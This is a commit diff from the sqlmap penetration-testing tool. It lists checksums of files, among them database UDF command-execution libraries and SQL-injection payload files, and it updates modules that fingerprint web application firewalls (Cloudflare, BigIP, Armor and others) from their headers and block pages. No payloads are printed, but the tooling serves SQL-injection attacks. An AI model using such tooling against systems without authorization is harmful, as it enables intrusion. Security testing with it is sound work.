0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py
|
||||
e52252bb81ce1a14b7245b53af33e75f thirdparty/colorama/ansitowin32.py
|
||||
ed4d76c08741d34ac79f6488663345f7 thirdparty/colorama/initialise.py
|
||||
c0707ca77ccb4a2c0f12b4085057193c thirdparty/colorama/__init__.py
|
||||
ad3d022d4591aee80f7391248d722413 thirdparty/colorama/win32.py
|
||||
c690e140157d0caac5824c73688231b3 thirdparty/colorama/winterm.py
|
||||
be7eac2e6cfb45c5e297ec5eee66e747 thirdparty/fcrypt/fcrypt.py
|
||||
e00542d22ffa8d8ac894c210f38454be thirdparty/fcrypt/__init__.py
|
||||
2f94ddd6ada38e4091e819568e7c4b7c thirdparty/gprof2dot/gprof2dot.py
|
||||
855372c870a23d46683f8aa39d75f6a1 thirdparty/gprof2dot/__init__.py
|
||||
d41d8cd98f00b204e9800998ecf8427e thirdparty/__init__.py
|
||||
e3b18f925d125bd17c7e7a7ec0b4b85f thirdparty/keepalive/__init__.py
|
||||
e0c6a936506bffeed53ce106ec15942d thirdparty/keepalive/keepalive.py
|
||||
d41d8cd98f00b204e9800998ecf8427e thirdparty/magic/__init__.py
|
||||
49f0d123e044dd32a452e2fe51f1a9c3 thirdparty/magic/magic.py
|
||||
d41d8cd98f00b204e9800998ecf8427e thirdparty/multipart/__init__.py
|
||||
03c8abc17b228e59bcfda1f11a9137e0 thirdparty/multipart/multipartpost.py
|
||||
3e502b04f3849afbb7f0e13b5fd2b5c1 thirdparty/odict/__init__.py
|
||||
127fe54fdb9b13fdac93c8fc9c9cad5e thirdparty/odict/odict.py
|
||||
08801ea0ba9ae22885275ef65d3ee9dc thirdparty/oset/_abc.py
|
||||
54a861de0f08bb80c2e8846579ec83bd thirdparty/oset/__init__.py
|
||||
179f0c584ef3fb39437bdb6e15d9c867 thirdparty/oset/pyoset.py
|
||||
d24924d878e24946e83cfc1459f806af thirdparty/pagerank/__init__.py
|
||||
7616693115d08f9b815a567515a0db56 thirdparty/pagerank/pagerank.py
|
||||
94a4abc0fdac64ef0661b82aff68d791 thirdparty/prettyprint/__init__.py
|
||||
ff80a22ee858f5331b0c088efa98b3ff thirdparty/prettyprint/prettyprint.py
|
||||
5c70f8e5f7353aedc6d8d21d4fb72b37 thirdparty/pydes/__init__.py
|
||||
a7f735641c5b695f3d6220fe7c91b030 thirdparty/pydes/pyDes.py
|
||||
d41d8cd98f00b204e9800998ecf8427e thirdparty/socks/__init__.py
|
||||
ec6bab337d529037fb7db0b126bce7cd thirdparty/socks/socks.py
|
||||
d41d8cd98f00b204e9800998ecf8427e thirdparty/termcolor/__init__.py
|
||||
ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py
|
||||
855372c870a23d46683f8aa39d75f6a1 thirdparty/xdot/__init__.py
|
||||
593473084228b63a12318d812e50f1e2 thirdparty/xdot/xdot.py
|
||||
08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_
|
||||
1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_
|
||||
7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_
|
||||
7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_
|
||||
6b4dc184e545d7bd5e7c31590647471d udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
|
||||
8c5573d1da59024c47d00cc8492a92df udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
|
||||
b9930f6bf43780fff469bc40e20599c3 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
|
||||
6930b6d67f4d52b5c1663ac2d8460576 udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
|
||||
5c177ee2cffad6133e99a24d1f913660 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
|
||||
4d0c06a51c5b03b41ad4df33a304d282 udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
|
||||
db0b1fe75fd9db96c1fc6ab42ae76d70 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
|
||||
df8524a627568864e1de516bbe5718ef udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
|
||||
3c3e3b72fa5b5860108a0350a0604ba2 udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
|
||||
b10e351f5d8c07fdf08dc3f44b00c01c udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
|
||||
7714b28ee7669f60a2321f1b4ce6bba8 udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
|
||||
9911482642131fd3be6a03a28294d24a udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
|
||||
fed2ed6df3f809b1019e9a0ee102799d udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
|
||||
d5d004b396ca5b14afe03a294d42c475 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
|
||||
5b79d7f667a0e1e4a70a5ceb70107cbe udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
|
||||
b396f050d36e82baf2724f140165fbd5 udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
|
||||
a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
|
||||
d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
|
||||
ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
|
||||
0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
|
||||
9bb247767c4ba118f2c5f0416e3e6151 waf/360.py
|
||||
deb8dd4543177479b185af8b383a8bdf waf/airlock.py
|
||||
0da662422cde266dd47cea3f5be6a309 waf/anquanbao.py
|
||||
012b4acd41f0c12df88cf0276c2afd1a waf/armor.py
|
||||
757fe0f66a24719fa596cb974ee6ae71 waf/baidu.py
|
||||
8a26fe9e0ae48e8f28272769aa7dc16e waf/barracuda.py
|
||||
826b64868a10caf1229d3bfcbbb4d594 waf/bigip.py
|
||||
3105f71b03c428f8b58cbf7a91eebff0 waf/binarysec.py
|
||||
e75422b8487f9937e050a60bc5c35896 waf/blockdos.py
|
||||
f60078f702612da43dd2a8ed07e26694 waf/ciscoacexml.py
|
||||
ac2edfa1d49b00b4bf730a9317090566 waf/cloudflare.py
|
||||
c69e1091521671452eaedf4787817ede waf/cloudfront.py
|
||||
765d0663658257ef0ab1060519c6e175 waf/comodo.py
|
||||
33633c9a2b9d53c325ba1110607d566f waf/datapower.py
|
||||
e0ad6e34b6082558e9f8f652d938c785 waf/denyall.py
|
||||
1ab6764976b3e2e28bab68cc73b5d8d9 waf/dotdefender.py
|
||||
037b715e1274fe2b4d2f31f6d24c9e77 waf/edgecast.py
|
||||
29d0c8331a4d7013d784e5dc91db49aa waf/expressionengine.py
|
||||
d50415b49d9df72cb9d193d05630ab8a waf/fortiweb.py
|
||||
c5d83d63647baa46dadf5cf992156edc waf/generic.py
|
||||
b302a688932296357fe10658a81eee0c waf/hyperguard.py
|
||||
f62b484e9083fcbf271a2b0c8f6d3528 waf/incapsula.py
|
||||
cc9c82cfffd8ee9b25ba3af6284f057e waf/__init__.py
|
||||
5a898cfc081236d176274c5b513d0401 waf/isaserver.py
|
||||
9689ff3faaeb2ea1837b3e04520b0e42 waf/jiasule.py
|
||||
07eb9ee33a3e31bfc74763bea8026a2b waf/knownsec.py
|
||||
32516985d3cb0aeeb1bf28062820b045 waf/kona.py
|
||||
c3de612a7960b08e1e7f97aa05b58df1 waf/modsecurity.py
|
||||
dc79a2e675d17df4cba1f8b839cbc11b waf/netcontinuum.py
|
||||
c218fd16246dfbbd0485cb3456182c71 waf/netscaler.py
|
||||
4e05b8169e53edd36a6269e937958744 waf/newdefend.py
|
||||
80eb59b4dcb62de8c97bd1bebbfb3f80 waf/nsfocus.py
|
||||
477c3b6b31e8eb1fe836bd5a24c9fab2 waf/paloalto.py
|
||||
e667efa27b53191315df547e95e04fa7 waf/profense.py
|
||||
8d5609a37127782fb35af4f67b5787ee waf/proventia.py
|
||||
40125df9f8184eab1926add588762294 waf/radware.py
|
||||
fffbd039ec907274cdb6ee8e07e3cac4 waf/requestvalidationmode.py
|
||||
44bef80f1a34663c3e0a963d969d9b1f waf/safe3.py
|
||||
65a519516a597232fd902082dbcbc796 waf/safedog.py
|
||||
e8cbddfffab8b400ea03f28ebfe14536 waf/secureiis.py
|
||||
32de8507c956422926aaf13085dbcf42 waf/senginx.py
|
||||
33db1ac9a11667199c7886bbb74f6b02 waf/sitelock.py
|
||||
ff2b052672f4753be1508f2a22118631 waf/sonicwall.py
|
||||
310b6081c65fb81917b8695b013559b6 waf/sophos.py
|
||||
ade8698c8096d373034bac72069873f6 waf/stingray.py
|
||||
b372c4fcc949767c38f2bead62d07418 waf/sucuri.py
|
||||
4c02fbf63989df9ab58b04229f00f6df waf/teros.py
|
||||
b5ea5375df444e0240f1ee0e2a8e52fb waf/trafficshield.py
|
||||
89a11a755a4ea3cb71feb3f5f2b5809e waf/urlscan.py
|
||||
0569c783e3487551affe5c91aec3c6d3 waf/uspses.py
|
||||
960a8db9d3807fcd87f7f66dbfaa4628 waf/varnish.py
|
||||
98c909c8b6e50d715e5b88c639ff1836 waf/wallarm.py
|
||||
7a723ce2f1b82d7297a2ab025d5ca0be waf/webappsecure.py
|
||||
75e51fea7f206e8faa2f743e44e58383 waf/webknight.py
|
||||
3bcac085dcd9ed26b50a2320e418e9f3 waf/yundun.py
|
||||
2a57f322f0b6e7b11b8df0909816a34f waf/yunsuo.py
|
||||
2d53fdaca0d7b42edad5192661248d76 xml/banner/cookie.xml
|
||||
37603bc0905af0c65480a2ca959990ec xml/banner/generic.xml
|
||||
d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml
|
||||
c97c383b560cd578f74c5e4d88c88ed2 xml/banner/mysql.xml
|
||||
9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml
|
||||
0d1c881156b760492d8004bd0d926c63 xml/banner/postgresql.xml
|
||||
b07b5c47c751787e136650ded060197f xml/banner/server.xml
|
||||
e5d141fb2ba31e4eae3495554b538908 xml/banner/servlet.xml
|
||||
d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
|
||||
350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml
|
||||
2394458d582a636c52342cff33ae3035 xml/banner/x-powered-by.xml
|
||||
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
|
||||
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
|
||||
2e13b9e0a51768969d4ccc02cf62ea70 xml/livetests.xml
|
||||
18b2c7e5738a3be72d759af96a9aaddf xml/payloads/boolean_blind.xml
|
||||
103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml
|
||||
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
|
||||
96adb9bfbab867d221974d3ddb303cb6 xml/payloads/stacked_queries.xml
|
||||
c8b152ecebf04ec997e52c6c78cbd488 xml/payloads/time_blind.xml
|
||||
033b39025e8ee0f302935f6db3a39e77 xml/payloads/union_query.xml
|
||||
313c0e1cc42de27a29c0e0ac67fee71d xml/queries.xml
|
||||
@@ -15,8 +15,9 @@ def detect(get_page):
|
||||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
page, headers, code = get_page(get=vector)
|
||||
retval = re.search(r"wangzhan\.360\.cn", headers.get("X-Powered-By-360wzb", ""), re.I) is not None
|
||||
retval |= code == 493 and "/wzws-waf-cgi/" in (page or "")
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
||||
@@ -15,8 +15,9 @@ def detect(get_page):
|
||||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
page, headers, code = get_page(get=vector)
|
||||
retval = re.search(r"MISS", headers.get("X-Powered-By-Anquanbao", ""), re.I) is not None
|
||||
retval |= code == 405 and "/aqb_cc/error/" in (page or "")
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
||||
21
waf/armor.py
Normal file
21
waf/armor.py
Normal file
@@ -0,0 +1,21 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.settings import WAF_ATTACK_VECTORS
|
||||
|
||||
__product__ = "Armor Protection (Armor Defense)"
|
||||
|
||||
def detect(get_page):
|
||||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
page, _, _ = get_page(get=vector)
|
||||
retval = "This request has been blocked by website protection from Armor" in (page or "")
|
||||
if retval:
|
||||
break
|
||||
|
||||
return retval
|
||||
@@ -18,7 +18,7 @@ def detect(get_page):
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
retval = re.search(r"fhl", headers.get("X-Server", ""), re.I) is not None
|
||||
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER), re.I) is not None
|
||||
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
||||
@@ -18,8 +18,10 @@ def detect(get_page):
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
retval = headers.get("X-Cnection", "").lower() == "close"
|
||||
retval |= re.search(r"\ATS[a-zA-Z0-9]{3,6}=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= re.search(r"\ATS[a-zA-Z0-9]{4,}=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
retval |= re.search(r"\AF5\Z", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
||||
@@ -16,9 +16,14 @@ def detect(get_page):
|
||||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
page, headers, code = get_page(get=vector)
|
||||
retval = re.search(r"cloudflare-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
retval |= re.search(r"\A__cfduid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
|
||||
if code >= 400:
|
||||
retval |= re.search(r"\A__cfduid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= headers.get("cf-ray") is not None
|
||||
retval |= re.search(r"CloudFlare Ray ID:|var CloudFlare=", page or "") is not None
|
||||
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user